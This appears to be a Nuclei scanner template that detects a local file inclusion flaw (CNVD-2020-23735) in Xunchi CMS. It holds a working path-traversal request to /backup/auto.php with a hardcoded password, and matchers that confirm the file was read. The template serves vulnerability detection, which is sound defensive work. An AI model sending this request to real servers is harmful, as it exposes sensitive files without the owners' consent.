id: CNVD-2020-23735 info: name: Xxunchi CMS - Local File Inclusion author: princechaddha severity: high description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information. reference: - https://www.cnvd.org.cn/flaw/show/2025171 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 tags: xunchi,lfi,cnvd,cnvd2020 http: - method: GET path: - "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php" matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N" - "display_errors" condition: and # Enhanced by mp on 2022/07/22